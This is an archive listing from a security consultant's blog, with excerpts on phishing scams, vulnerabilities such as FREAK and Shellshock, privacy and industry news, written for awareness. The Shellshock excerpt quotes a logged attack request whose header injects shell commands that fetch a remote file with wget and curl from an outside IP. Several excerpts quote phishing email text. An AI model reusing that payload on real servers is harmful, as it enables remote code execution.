Kompendium: IT Security for small and medium companies](https://www.sorinmustaca.com/my-article-in-security-insider-kompendium-it-security-for-small-and-medium-companies/) - The Compendium and the article are free, you only need to register in order to download Source: Kompendium IT-Sicherheit für den Mittelstand Article: Zahlt sich kostenlose Sicherheit wirklich aus? Freeware, Open Source und unentgeltliche Cloud-Dienste Malware, Hacking-Attacken, Software-Schwachstellen: Ist es angesichts der ausufernden Bedrohungslandschaft überhaupt möglich, sich mit Security-Tools für lau umfassend abzusichern? In - [This is how you know you got a good SEO!](https://www.sorinmustaca.com/this-is-how-you-know-you-got-a-good-seo/) - When some chinese spammer gets in touch with you about your domain, you know that they have found you somehow. My guess is that they take LinkedIn as source and they scrape anything in a certain area. Dear Sir or Madam, We are an agency for registering domain names authorized by Chinese government. Today, - [What is Safe Harbor and what do companies have to consider](https://www.sorinmustaca.com/what-is-safe-harbor-and-what-do-companies-have-to-consider/) - The background story The European Commission’s Directive on Data Protection went into effect in October 1998, and would prohibit the transfer of personal data to non-European Union countries that do not meet the European Union (EU) "adequacy" standard for privacy protection. While the United States and the EU share the goal of enhancing privacy protection - [Quoted in Tech News World: Paris Attacks Deepen Encryption Debate](https://www.sorinmustaca.com/quoted-in-tech-news-world-paris-attacks-deepen-encryption-debate/) - Paris Attacks Deepen Encryption Debate By Richard Adhikari Nov 18, 2015 5:00 AM PT ISIS has threatened to attack the United States and continue its reign of terror elsewhere in the world, so an argument could be made that the high-tech industry would serve the greater good by agreeing to weaken encryption. "No, it - [Quoted in ECommerceTimes: Gmail to Warn Users of Unencrypted Email](https://www.sorinmustaca.com/quoted-in-ecommercetimes-gmail-to-warn-users-of-unencrypted-email/) - Gmail to Warn Users of Unencrypted Email Author: Richard Adhikari Quotes: The warning "will help in cases where hackers try to perform DNS poisoning while trying to infect or phish users visiting well-established websites," security consultant Sorin Mustaca said. Going with TLS is not necessarily the answer because "many emails would not reach - [Quoted in the (ISC)2 Europe newsletter: ENCRYPTION IS NOT SOLVING ALL CYBERSECURITY PROBLEMS](https://www.sorinmustaca.com/quoted-in-the-isc2-europe-newsletter-encryption-is-not-solving-all-cybersecurity-problems/) - ENCRYPTION IS NOT SOLVING ALL CYBERSECURITY PROBLEMS Sorin Mustaca, CSSLP, shares his thoughts from a recent Frankfurt-based automotive show on the overreliance of the car industry on Encryption, noting "...all those lights are sensors and processors which communicate with each other via the CAN BUS (Controller Area Network). If one of them is - [Major PayPal failure: sending emails following all rules of a "good" phishing email](https://www.sorinmustaca.com/major-paypal-failure-sending-emails-following-all-rules-of-a-good-phishing-email/) - The email below (in German) is from PayPal. It is not a phishing email or a spam email pointing to some online pharmacy. I assure you of this. I have verified the DKIM and SPF information in the headers, checked all headers of any trace of alteration and of any trace of foreign IP address - [How to recognize a money laundry scam](https://www.sorinmustaca.com/how-to-recognize-a-money-laundry-scam/) - This is the state of mind you should always have when you read an email. When something is too good to be true, it usually isn’t true. Here is an email I got, which sounds…... The post How to recognize a money laundry scam appeared first on Improve Your Security. Want to get the book - [How to recognize a targeted malware/phishing attack](https://www.sorinmustaca.com/how-to-recognize-a-targeted-malwarephishing-attack/) - I received an email pretending to be from my hoster Strato (known as Cronon AG) telling me that my domain I have for my IT Consulting business has been suspended because of complains they received.... The post How to recognize a targeted malware/phishing attack appeared first on Improve Your Security. Want to get the book - [LinkedIn phishing ? Think again...](https://www.sorinmustaca.com/linkedin-phishing-think-again/) - When you see such an email, you don't think that it is a phishing... After all, why would anyone steal your LinkedIn credentials, right? Nobody would request a ransom to give your credentials back, nobody would steal your email & password and try to reuse them on other websites. You have, after all, read my - [Self-driving cars and ethics: would you drive a car that would sacrifice you instead of others?](https://www.sorinmustaca.com/self-driving-cars-and-ethics-would-you-drive-a-car-that-would-sacrifice-you-instead-of-others/) - I stumbled upon this nice article with the title: Why Self-Driving Cars Must Be Programmed to Kill Not many ask this question now, but it has to be asked. How should the car be programmed to act in the event of an unavoidable accident? Should it minimize the loss of life, even if it means sacrificing - [Classical Antivirus is dead.Long live EDR?](https://www.sorinmustaca.com/classical-antivirus-is-dead-long-live-edr/) - We recall last year's article in WSJ quoted executives from antivirus pioneer Symantec declaring antivirus software “dead” and stating that the company is focusing on developing technologies that attack online threats from a different angle. I also wrote about it here: http://www.sorinmustaca.com/2014/05/08/is-antivirus-really-dead-it-depends-what-you-call-antivirus/ Now the new concept has a name: Endpoint Detection and Response (EDR). Kelly Jackson Higgins, - [Bought a new domain, the effects in the web are incredible...](https://www.sorinmustaca.com/bought-a-new-domain-the-effects-in-the-web-are-incredible/) - I wrote in the post "What do you think: aggressive sales campaign or fraud?" about the attempt to impress and scare me of losing my domain. Now, I bought a new domain which was free in Internet. I watched this domain for two years to become available again, after i lost it because of a - [Cyber Security is a Shared Responsibility: October is Cyber Security Month](https://www.sorinmustaca.com/cyber-security-is-a-shared-responsibility-october-is-cyber-security-month/) - The 3rd consecutive year, celebrating the European Cyber Security Month (ECSM) through-out October, has just been kicked-off in Brussels. Here is the agenda: WEEK 1 Cyber Security Training for Employees WEEK 2 Creating a Culture of Cyber Security at Work WEEK 3 Code Week for All WEEK 4 Understanding Cloud Solutions for All WEEK - [Encryption is not solving all cybersecurity problems](https://www.sorinmustaca.com/encryption-is-not-solving-all-cybersecurity-problems/) - I visited last week the IAA in Frankfurt, Germany. IAA stands for International Automobile Exhibition and takes place every year in Frankfurt, Germany. This is the place where every year the latest cars are being presented but also the newest technologies around cars. This year it was a lot about mobility, interaction, autonomous parking and driving, - [T-Mobile advises 15 Mil customers affected by the Experian breach to use Experian's ProtectMyID service](https://www.sorinmustaca.com/t-mobile-advises-15-mil-customers-affected-by-the-experian-breach-to-use-experians-protectmyid-service/) - From time to time there is a WTF Moment when you ask yourself: Is he kidding?, Is he stupid?, or Does he really think that everyone else is stupid? T-Mobile CEO on Experian's Data Breach The investigation is ongoing, but what we know right now is that the hacker acquired the records of approximately - [As expected: the USB Stick-like infection from PCs goes to automotive as well!](https://www.sorinmustaca.com/as-expected-the-usb-stick-like-infection-from-pcs-goes-to-automotive-as-well/) - Just seen this article on Wired Magazine: Car Hack Technique Uses Dealerships to Spread Malware At the Derbycon hacker conference in Louisville, Kentucky last week, security consultant Craig Smith presented a tool designed to find security vulnerabilities in equipment that’s used by mechanics and dealerships to update car software and run vehicle diagnostics, and sold by - [WinRAR: The wrong way of answering to a critical vulnerability](https://www.sorinmustaca.com/winrar-the-wrong-way-of-answering-to-a-critical-vulnerability/) - With over 500 million users worldwide, WinRAR is by far the most popular compression program. An independent security lab found a remote code execution vulnerability in the official WInRAR SFX v5.21 software. The vulnerability allows remote attackers to unauthorized execute system specific code to compromise a target system. The issue is located in the Text - [Nigerian scams on a totally new level](https://www.sorinmustaca.com/nigerian-scams-on-a-totally-new-level/) - I received every day a few requests on LinkedIn and I also send a few. Many of these people I don't know personally, and they are from all kind of industries. Usually, they are interested in IT Security, but not always. Most important, I never receive direct messages like the one below: The few keywords - [For entrepreneurs and product managers: Startup Advices from Paul Graham](https://www.sorinmustaca.com/for-entrepreneurs-and-product-managers-startup-advices-from-paul-graham/) - Read the article here: Paul Graham’s Startup Advice for the Lazy Here is what determined me to write this post: The best way to come up with startup ideas is to ask yourself the question: what do you wish someone would make for you? The most important parts, from my point of view, together with - [Goodbye Avira, ready for the new challenges! (updated)](https://www.sorinmustaca.com/goodbye-avira-ready-for-the-new-challenges/) - With this email, I announced my colleagues in Avira that I am going very soon to take on a new challenge outside of Avira: Hello, In each of our lives comes a time when we have to leave "home" and try something new. After 11 years, this time has come for me as well. And - [What is Strategic Product Management and why do we need it in the security industry](https://www.sorinmustaca.com/what-is-strategic-product-management-and-why-do-we-need-it-in-the-security-industry/) - "Strategic Product Management" is, first of all, a buzz word. A hype, if you want. But that doesn't mean that you don't need it. Most technology companies have a product management department that should act as the “voice of the customer” on one side and translating their finding into requirements on the other side. I won't - [Email campaign with malware: Javascript downloaders instead of executables as attachments](https://www.sorinmustaca.com/email-campaign-with-malware-javascript-downloaders-instead-of-executables-als-attachments/) - Several types of emails are being sent with a ZIP attachment containing a single file with this mask: .doc.js. Here is as text. Apparently, Google loves text because it can index it better, so I am doing here some SEO :) Notice to Appear, You have not paid for driving on a toll - ["Apple iPhone 7 testers wanted": Probably the most complex scam I've seen this year!](https://www.sorinmustaca.com/apple-iphone-7-testers-wanted-probably-the-most-complex-scam-ive-seen-this-year/) - This scam is sent by CHTAH.COM platform which is known to send millions of spam emails. You can see its added "value" by inserting the three colored rectangles on top of the mail. "iPhone 7 Testers Wanted!" is trying to lure the readers to a website that looks very much like the times.com website. - [There are also nice parts in giving information to Google. The result is ... impressive.](https://www.sorinmustaca.com/there-are-also-nice-parts-in-giving-information-to-google-the-result-is-impressive/) - I am logged in in the Chrome browser with my Google account. I have my birthday correctly added there, and yes, it is today... :) Result: A Google start page personalized for me. I have to say that I am kind of ... impressed. Of course it is easy to do it with such much information. - [How to convince your boss that adding security features from the beginning is worth doing it!](https://www.sorinmustaca.com/how-to-convince-your-boss-that-adding-security-features-from-the-beginning-is-worth-doing-it/) - Everything of value has a cost. The same applies to security! I recently flew to Berlin for business purposes with a known airline. As I was the first one checking in, I was asked if I want the seat near the emergency exit. This is, usually, the place where you have more space for your legs. So, - [What do you think: aggressive sales campaign or fraud?](https://www.sorinmustaca.com/what-do-you-think-aggressive-sales-campaign-or-fraud/) - What do you think after you quickly read this letter? What makes this email special: addressed to me, using the data from the domain registration (mandatory things, which my registrar added) uses my domain name A lot of red text written in capitals special keywords like "notice", "important", "notification", "expiration", "act", "immediately" has a clear deadline - [Security release 4.2.4 for Wordpress is available - update now](https://www.sorinmustaca.com/security-release-4-2-4-for-wordpress-is-available-update-now/) - This release addresses six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site. Read more here: https://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/ WordPress 4.2.4 also fixes four bugs. For more information, see the release notes or consult the list of changes. If you have your site already at Wordpress 4.x and it is properly configured, - [PayPal Phishing for German customers with innovative social engineering technique](https://www.sorinmustaca.com/paypal-phishing-for-german-customers-with-innovative-social-engineering-technique/) - Nothing special in this phishing email in German from the "PayPal Team" asking to click in order to unlock your PayPal account. PayPal - Informationen erforderlich! Hallo Ihr PayPal-Konto ist vorübergehend gesperrt. Sie können keine weiteren Zahlungen bei PayPal tätigen. Um die Sperrung Ihres Kontos aufzuheben und die Entfernung all Ihrer aktiven Fälle sowie - [Here is how to stop Windows 10 to deliver updates from your PC to complete strangers](https://www.sorinmustaca.com/here-is-how-to-stop-windows-10-to-deliver-updates-from-your-pc-to-complete-strangers/) - If you have a Windows 7 or 8.x, chances are that you already upgraded to the latest Windows version. What you don't know is that Windows Update Delivery optimization (WUDO) has set up your computer in a Peer to Peer network to deliver updates for other Windows 10 users. „Windows Update Delivery Optimization lets you - [Windows 10 and "we own you": questionable default privacy settings](https://www.sorinmustaca.com/windows-10-and-we-own-you-questionable-default-privacy-settings/) - First thing you see after the Windows 10 migration is done is the "Customize Settings" dialog below. In a few words, Microsoft is trying to "own" the user that just got the "best OS of all times", at least according to Microsoft. 1. Just turn everything OFF 2. Let "Smart Screen" ON, - [Would you sell your business on LinkedIn?](https://www.sorinmustaca.com/would-you-sell-your-business-on-linkedin/) - If you receive on LinkedIn an email like the one below, with the subject "get back to me ASAP", wouldn't you wonder who is needing you so badly? Do you want to sale 50% ownership or 100% ownership of your business. I just want something casual I could invest on with Eight Hundred Thousand - [ITSecurityNews.info says Farewell to Mailchimp](https://www.sorinmustaca.com/itsecuritynews-info-says-farewell-to-mailchimp/) - .. and hope to never see you again! Yes, I closed my account because of so many issues in the past time. First, it was because I had too many mails, then too many subscribers, then the emails below. Due to the fact that probably some bots were registered, some sensitive keywords went in - [Phishing on a different level: IRS Scam](https://www.sorinmustaca.com/phishing-on-a-different-level-irs-scam/) - IRS(Internal Revenue Service) is the official authority in the USA to collect taxes. "Why would someone phish them?", you may ask. That's why:(see red area below). In the form they ask you to have access to your bank account. They have all needed proves to substitute you: address, tax payer ID and many - [Interesting blog trackback spam](https://www.sorinmustaca.com/interesting-blog-trackback-spam/) - A trackback is one of four types of linkback methods for website authors to request notification when somebody links to one of their documents. This enables authors to keep track of who is linking to their articles. Some weblog software, such as SilverStripe,WordPress, Drupal, and Movable Type, supports automatic pingbacks where all the links in - ["What do you want to download today?" (free eBooks from Microsoft)](https://www.sorinmustaca.com/what-do-you-want-to-download-today-free-ebooks-from-microsoft/) - Microsoft finally found out that Free is very, very powerful. Especially when you want to do "free" marketing. For example, this link is going viral across the Internet. So, in the Microsoft way: "What do you want to download today?" :) (I hope this slogan is not copyrighted. :) ) Thank you, Eric Ligman. If you're - [Cyber security tips (in German and English)](https://www.sorinmustaca.com/cyber-security-tips-in-german-and-english/) - If you understand German, there are tons of information about CyberSecurity and how to improve your security. BSI (Bundesamt für Sicherheit in der Informationstechnik) has a lot of resources published here:Alliance for Cybersecurity : http://ift.tt/UQNm4c The materials are available here: http://ift.tt/1ILTynT They… < p class="more-link-p">Read more → The post Cyber security tips (in German and English) appeared - [Phishing created for Apple's mobile devices](https://www.sorinmustaca.com/phishing-created-for-apples-mobile-devices/) - I received last night an email pretending to come from Apple's support. But, it is badly made if you see it in an email client. Dear Customer AppleID14028364ca Due to recent updates we are asking many of our customers to confirm their information this is nothing to worry about. We are making sure we have - [What you need to know about the "Hacking Team" which was hacked (and I was quoted)](https://www.sorinmustaca.com/what-you-need-to-know-about-the-hacking-team-which-was-hacked-and-i-was-quoted/) - My good friend Richard Adhikari has written yesterday a very good article about this incident. Read it here: Hacking Team's Dingy Laundry Hung Out Online Here is where I get quoted as founder of Sorin Mustaca IT Security Consulting: A Black Bag Job? "It could be that some government agency who's a customer of Hacking - [OpenDNS acquired by Cisco](https://www.sorinmustaca.com/opendns-acquired-by-cisco/) - I wrote an article which recommends OpenDNS to FritzBox users to use OpenDNS to filter malicious domains and perform parental control on the traffic that gets into their home routers. & And now, not a week later I see: Cisco made a big acquisition offer to OpenDNS and they accepted it. Wow, what a news! Read here the - [Targeted spam: Cotap is a secure texting app for teams.](https://www.sorinmustaca.com/targeted-spam-cotap-is-a-secure-texting-app-for-teams/) - You thought that there are only Advanced Persistent Threats and Spear Phishing? Here is a new one : Targeted Ads. This time it might not be so dramatic, but imagine that you sent this to a lot of people. How many do you think that will register? So, what's the catch? If there are - [How much is a blog instance worth?](https://www.sorinmustaca.com/how-much-is-a-blog-instance-worth/) - I wrote in the post Do you really know who’s visiting your website? about how often hackers probe my websites. IT Security News has of today this: 5,914 blocked malicious login attempts / was 2092 on May 8th 2,182 spam comments blocked by Akismet. / was 2115 on May 8th The login attempts more than doubled in just 5 - [NIST Released "Guide to Industrial Control Systems (ICS) Security"](https://www.sorinmustaca.com/nist-released-guide-to-industrial-control-systems-ics-security/) - NIST is pleased to announce the release of Special Publication 800-82, Revision 2, Guide to Industrial Control Systems (ICS) Security. Link to the full news announcement about this Special Publication (SP 800-82 Revision 2) can be found on the CSRC News page at: http://csrc.nist.gov/news_events/#june8b Direct link to the SP 800-82 Revision 2 document (in .PDF) - [How to get the version of an MSI package in Linux](https://www.sorinmustaca.com/how-to-get-the-version-of-an-msi-package-in-linux/) - Ever tried to get the version of an MSI package on Linux ? Exiftool doesn't do that, unfortunately. I requested it in the forum, let's see if somebody jumps on it. :) Until then, try to use the system utility "file" and do some parsing on the bold red text. #file google.msi: Composite Document File - [Spam is indeed good for something! But you will never guess what for.](https://www.sorinmustaca.com/spam-is-indeed-good-for-something-but-you-will-never-guess-what-for/) - I have several websites, but the most visited by far is IT Security News (http://www.ITSecurityNews.info). I receive a lot of spam in it which is caught by the plugin Akismet of Wordpress. But, from time to time, I receive an email directed to info@ or other addresses. The latest one looks like the screenshot below and I - [Do you really know who’s visiting your website?](https://www.sorinmustaca.com/do-you-really-know-whos-visiting-your-website/) - We live in the world of Analytics where words like “Big Data” are everywhere to be seen. But, are you really sure that the visitors of your website or blog are really interested in your content? A few years ago, maybe… But now, the cybercriminals, or more exactly their bots, are trying to gain access - [The anatomy of a live attack from China](https://www.sorinmustaca.com/the-anatomy-of-a-live-attack-from-china/) - I am maintaining a free service that provides IT Security news called ITSecurity News. Some time ago, it was called URLAggregator. It does nothing else than aggregate various IT news websites, selects IT security news and republishing them in the name of the original authors. I was asking myself why I get so much traffic on - [Microsoft, you're not as smart as you thing you are!](https://www.sorinmustaca.com/microsoft-youre-not-as-smart-as-you-thing-you-are/) - I was installing an update of OneNote and I suddenly received this popup: Continuing could be expensive" You're connected to a network that limits downloads every month. We need to stream some large files over your network connection to install Ofifice, so we recommend installing while connected to an unrestricted netowork. ... Seriourly, Microsoft? - [Do you know what makes the Internet so slow?](https://www.sorinmustaca.com/do-you-know-what-makes-the-internet-so-slow/) - According to some online sources, PORN is what uses around 30% of the Internet's bandwidth. Why do I care about this? Because the top searches in my news portal IT Security News (www.itsecuritynews.info) are: nude videos, porn and naked pictures of celebrities. I guess we are living in a very ... lonely world. This is also how - [Top 500 cybersecurity companies](https://www.sorinmustaca.com/top-500-cybersecurity-companies/) - Not so many people outside of the IT Security business know which are the top 500 companies in this field. Cybersecurity Ventures has published this top: check it here. I am not allowed to reproduce any parts of it, but I can tell you that the number 1 is FireEye. From the AV world, we - [How a Shellshock exploit attempt looks like](https://www.sorinmustaca.com/how-a-shellshock-exploit-attempt-looks-like/) - One of my HTTP servers hosted on an Amazon EC2 receives regularly strange requests like these: One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; - [Congratulations, Improve Your Security now has 700 readers!](https://www.sorinmustaca.com/congratulations-improve-your-security-now-has-700-readers/) - Just received this email from LeanPub! Thank you all for downloading and reading the book. Expect more content very soon ! Want to get the book ? Get it from here: Improve your Security” - [Why security recommendations often get ignored](https://www.sorinmustaca.com/why-security-recommendations-often-get-ignored-2/) - I read very often about vulnerabilities and companies that got hacked. Many times, the reason for which they got hacked was because some recommendation issued by some smart people (read: security minded people) are ignored. But why are they ignored? I found some articles where several explanations are given for what is called “information avoidance“. - [Massive security update for all Apple devices: iOS 8.3](https://www.sorinmustaca.com/massive-security-update-for-all-apple-devices-ios-8-3/) - 39 fixes are supposed to be delivered via iOS 8.3. Areas like KeyStore, Drivers, Backup, Kernel, Certificate Trust Policy, Networking, Lock Screen, Safari and the WebKit, and many more are being fixed. Apple doesn't provide how critical the issues were, but from what I see there, at least a dozen or so made me raise my - [(ISC)2 EMEA: Quote for the Day](https://www.sorinmustaca.com/isc2-emea-quote-for-the-day/) - In the News Quote for the Day "It is no secret that the cyber criminals are where the money is. If the targets are easy to breach, it is even better since this improves the ratio effort/outcome for them." Sorin Mustaca, CSSLP, covers the basics for small to medium business inComputerWorldUK's Infosecurity Voice and on the - [Set up an Ad-filter with Privoxy on Raspberry Pi for free](https://www.sorinmustaca.com/set-up-an-ad-filter-with-privoxy-on-raspberry-pi-for-free/) - I hate ads... They are for many companies, unfortunately, the main source of income. So, they are a necessary evil in today's world where everything is expected to be free of charge. In general, I use an anti-advertisements filter in the browser. Now I use AdBlock for Chrome. It is available for FF and IE as well. But, what - [Pwn2Own: Nothing is safe](https://www.sorinmustaca.com/pwn2own-nothing-is-safe/) - The annual Pwn2Own hacking competition wrapped up its 2015 event in Vancouver with another 21 critical bugs in Firefox, Chrome, Safari, IE, Adobe Flash, Adobe reader, and last, but definitely not least, the Windows operating system. For those who don’t know the contest, the name “Pwn2Own” is derived from the fact that contestants must “pwn” - [IT Security essentials for small and medium enterprises](https://www.sorinmustaca.com/it-security-essentials-for-small-and-medium-enterprises/) - Since I first published the free eBook "Improve your security" dedicated to end users, I've been asked many times to give advises for small and medium enterprises. At first, I thought that this is a very different topic than what I wrote before. However, after some thinking, I realized, that difference between the behavior of end-users at - [OpenSSL: Patch for secret “high severity” vulnerability](https://www.sorinmustaca.com/openssl-patch-for-secret-high-severity-vulnerability/) - After Heartbleed, Poodle and FREAK which turned the IT world upside down, numerous companies have asked to have a though review of the most used SSL implementation in the world: OpenSSL. And indeed, in order to avoid being again in the news, the OpenSSL Foundation is set to release later this week several patches for - [The mysterious OpenSSL vulnerability has been patched](https://www.sorinmustaca.com/the-mysterious-openssl-vulnerability-has-been-patched/) - No, it doesn’t have a name like Heartbleed or POODLE, it was “just” a denial-of-service. “Just” is by no means something to be ignored, but it is less dangerous with the previous vulnerabilities. All users of OpenSSL 1.0.2 should upgrade immediately to version 1.0.2a. In the advisory published on their website the OpenSSL vulnerability is called - [“Ze Foreign Accent” spam is back](https://www.sorinmustaca.com/ze-foreign-accent-spam-is-back/) - Twelve years ago the IT security world was fighting against an unprecedented amount of spam emails. Spam is not and never was just a nuisance; it is a big problem because it slows down the good emails and takes up resources. Together with Virus Bulletin and some antispam researchers from various companies, a list called - [Cybercriminals go where the money is – SMEs](https://www.sorinmustaca.com/cybercriminals-go-where-the-money-is-smes/) - I wrote some time ago an article called “IT Security essentials for companies and small businesses”. I tried to pitch it to some companies that have to do with security and… nobody wanted it. Good for me. My good friends… Read more here: The post Cybercriminals go where the money is – SMEs appeared first - [FREAK: All Windows versions are affected too](https://www.sorinmustaca.com/freak-windows-versions-affected/) - UPDATE on the FREAK vulnerability in SSL: it affects not only Android and iOS but all Windows versions too. I wrote about the new SSL vulnerability called FREAK – Factoring RSA Export Keys – affects around 36% of all sites trusted by browsers and around 10% of the Alexa top one million domains, according to - [Security experts are FREAKing out again because of a new OpenSSL vulnerability](https://www.sorinmustaca.com/security-experts-freaking-new-openssl-vulnerability/) - After Heartbleed, a new security vulnerability in SSL is making headlines and producing again headaches for security experts. As any good and mind blowing (for most people) vulnerability, it has a nice name - FREAK, a CVE number - CVE-2015-0204 and a dedicated website https://freakattack.com/ . FREAK – Factoring RSA Export Keys – affects around - [Spam with a malicious taste (update)](https://www.sorinmustaca.com/spam-malicious-taste/) - This post appeared originally in: IT Security blog: http://itsecurity.co.uk/2015/03/spam-malicious-taste/ I haven't seen in a while a well done complex spam with malicious payload. This one appears to be addressed to first name of the email recipient. As you can see in the subject, it is addressed to "SORIN" since my email address is sorin.mustaca@... The - [Security Insider newsletter promotes “Improve your security” as headline](https://www.sorinmustaca.com/security-insider-newsletter-promotes-improve-your-security-as-headline/) - Kostenloses eBook „Improve your Security“ nimmt Internet-Nutzer an die Hand Wer sich im Internet bewegt, sollte sich mit IT-Sicherheit auseinandersetzen. Dies gilt umso mehr, als dass soziale Netzwerke und mobile Geräte aus dem Alltag nicht mehr wegzudenken sind. Mit… Read more → The post Security Insider newsletter promotes “Improve your security” as headline appeared first - [Mentioned in (ISC)2 EMEA Newsletter](https://www.sorinmustaca.com/mentioned-isc2-emea-newsletter/) - My blog post "What is a security expert?" which I published in the (ISC)2 Blog was mentioned in the (ISC)2 EMEA Newsletter: Germany's Sorin Mustaca, CSSLP takes an analytic look at what it means to be an information security professional, also on the (ISC)² Blog - [Review of “Improve your Security” in Security Insider](https://www.sorinmustaca.com/review-of-improve-your-security-in-security-insider/) - „Improve your Security“ nimmt Internet-Nutzer an die Hand 26.02.15 | Autor / Redakteur: Ferdinand Kunz / Stephan Augsten Mit kleinen Schritten von vielen Anwendern soll das Internet als Ganzes sicherer werden, so der Wunsch von Sorin Mustaca. Wer sich… Read more → The post Review of “Improve your Security” in Security Insider appeared first - [What is a security expert?](https://www.sorinmustaca.com/what-is-a-security-expert/) - I've been called a "security expert" many times and I've heard many times other people around me called the same. The reason I am writing this article is that I am frustrated by how some security experts are seing and implementing security in their every day jobs. But, let's start with the beginning: What does - [Comments on Privacy for "Data Privacy Day 2015"](https://www.sorinmustaca.com/comments-privacy-data-privacy-day-2015/) - My comments on Data Privacy Day 2015: Top Experts Comment on Privacy Issues (+Infographic) from http://www.cloudwards.net. Our society has become in a very short time digitally connected and the consumers didn’t have the time to understand the implications of data privacy on their lives. We can be sure that every provider of an online service is doing everything - [Every minute invested in planning, saves you 10 in implementation](https://www.sorinmustaca.com/every-minute-invested-planning-saves-10-implementation/) - I have no idea who came with this statistic, but I can confirm that it is true ! The example below doesn't want to explain how to search for strings nor how to use TDD, but to demonstrate that a bit of planning in advance can really speed things up! I was in - [Blog comment spam. Is it worth the effort?](https://www.sorinmustaca.com/blog-comment-spam-worth-effort/) - My first article published on Kevin Townsend's ITSecurity.co.uk blog: Blog comment spam. Is it worth the effort? or go to this link: http://itsecurity.co.uk/2015/01/blog-comment-spam-worth-effort/ - [Spam impersonating PayPal using attached form](https://www.sorinmustaca.com/spam-impersonating-paypal-using-attached-form/) - A classical phishing email... Nothing special (same bad English, as always). Dear Valued Customer, Unauthorized access has been detected in your account. Unfortunately, due to this event, our security system has limited the access to your account. Account Limitations prevent you from completing certain actions with your account, such as withdrawing, sending, or receiving money. - [When security software gets bundled in the wrong way](https://www.sorinmustaca.com/when-security-software-gets-bundled-in-the-wrong-way/) - After installing Adobe Shockwave Player from here I am presented with this offer. I don't want to use Norton, so I unselect the checkbox. I actually read the text, well, most of it - the part which is visible, as you can see below. By clicking on the only button visible, I agree with the - [BSI IT Security Report 2014 - attacks on industrial objectives](https://www.sorinmustaca.com/bsi-it-security-report-2014-attacks-on-industrial-objectives/) - BSI (Federal Office for Information Security) published "IT Security Report 2014" (in German), a document with 40 pages of information and reports on cyber security. Probably the most interesting parts of the reports are those in Chapter 3.3 - Security Incidents in the industry. 3.3.1 reports about an APT (Advanced Persistent Threat) attack on a steel - ["There's a new personal notification message special for " - a scam for "Linked In"](https://www.sorinmustaca.com/theres-a-new-personal-notification-message-special-for-a-scam-for-linked-in/) - "There's a new personal notification message special for Sorin Mustaca" is the subject of the email pretending to come from "Automation LinkedInNotifier". But then, why is it coming from "gci@grey.si" ? Come on spammers, you disappoint me :) Anybody can see it is a fake... And "Linked In" ? Not even this is right... - [Heise is offering IT Security consulting for free. But should you trust them?](https://www.sorinmustaca.com/heise-is-offering-it-security-consulting-for-free-but-should-you-trust-them/) - Heise created a portal for companies to assess their IT security. Details can be found here: https://www.heise-consulter.de/ You don't have to register to take part of the survey which assesses your company's security. If you want anonymity, check this page. It is important to mention who sponsored the initiative: Sophos, Baramundi, GateProtect, - [10 Signs Your Business Should Invest in IT Security](https://www.sorinmustaca.com/10-signs-your-business-should-invest-in-it-security-2/) - Customers report that Google and security solutions categorize your website as suspicious or malicious A domain or an IP address has a low reputation and eventually is blacklisted if it sends spam or it hosts malicious software or malicious web… Read more → from Improve Your Security http://ift.tt/1r8JUFf via improve-your-security.org Get the free eBook from here - [10. Install software a page pretends to require: 10 signs you should invest in your cyber security](https://www.sorinmustaca.com/10-install-software-a-page-pretends-to-require-10-signs-you-should-invest-in-your-cyber-security/) - It is said that a picture is worth 1000 words. I don’t know if two pictures are worth 2000 words, but I think they speak for themselves. If a website requires some “helper software” or it reports… Read more → from Improve Your Security http://ift.tt/1uoi568 via improve-your-security.org Get the free eBook from - [Wordpress 4.0.1 update - important security fixes](https://www.sorinmustaca.com/wordpress-4-0-1-update-important-security-fixes/) - All my blogs use Wordpress. Why Wordpress ? Because it is customizable and I can tweak it in any way I want... Well, almost... But from time to time there is the need to update it. Yesterday the update 4.0.1 was release which fixes important security bugs: Three cross-site scripting issues that a contributor or author - [9. Gave personal information to anyone: 10 signs you should improve your cyber security](https://www.sorinmustaca.com/9-gave-personal-information-to-anyone-10-signs-you-should-improve-your-cyber-security/) - 9. You respond to an email from an unknown person requesting personal information If you received an email in which someone promises you a fabulous fortune just for doing something which is almost no trouble, they usually need some information…Read more → from Improve Your Security http://ift.tt/1qReH3E via improve-your-security.org Get the free eBook from here - [8. You unsubscribe from spams: 10 signs you should invest in your personal cybersecurity](https://www.sorinmustaca.com/8-unsubscribe-spams-10-signs-invest-personal-cybersecurity/) - You unsubscribe from commercial emails that you never requested Remember that spam emails are made to look authentic. This means that they will almost always contain some links which allow you to unsubscribe. But, instead of that they just make you verify that your emailaddress is valid. Don't unsubscribe! Just mark the email as spam - [7. A lot more ads in the browser: 10 Signs you should invest in your personal cyber security](https://www.sorinmustaca.com/7-a-lot-more-ads-in-the-browser-10-signs-you-should-invest-in-your-personal-cyber-security/) - 7. You see in your browser a lot more ads than ever before If your browser window is cluttered with ads which didn’t seem to be there last time you visited the website, it may be that you installed a…Read more → from Improve Your Security http://ift.tt/1GxiGfU via improve-your-security.org Get the free eBook from here - ["Ze Foreign Accent" spam returns ](https://www.sorinmustaca.com/ze-foreign-accent-spam-returns/) - Remember the Spammer's Compendium (where I have a spam method named after me: (UH!Mustaca!HTML))? There is an entry from 2003 called "Ze Foreign Accent". Back then it was rather primitive, but now it comes in a much improved (if we can say that) form: The link on "Click here" goes to a Google Drive hosted site - [6. Your emails are marked as spam: 10 signs you should invest in your personal cyber security](https://www.sorinmustaca.com/6-your-emails-are-marked-as-spam-10-signs-you-should-invest-in-your-personal-cyber-security/) - 6. Friends report that your emails are marked as spam or that they receive unsolicited emails from you or that your emails never reach them Antispam services use the reputation of a domain and email address to detect if it…Read more → from Improve Your Security http://ift.tt/1z2AxpV via improve-your-security.org Get the free eBook from here - [5. Posts you never authorized or wrote on Facebook: 10 signs you should invest in your personal cyber security](https://www.sorinmustaca.com/5-posts-you-never-authorized-or-wrote-on-facebook-10-signs-you-should-invest-in-your-personal-cyber-security/) - 5. Your social media profile has posts you never authorized or wrote If you see in your Facebook or Twitter account posts that you didn’t write, then most probably someone or something got access to your account. In this context it…Read more → from Improve Your Security http://ift.tt/1x2UhvQ via improve-your-security.org Get the free eBook from here - [4/10 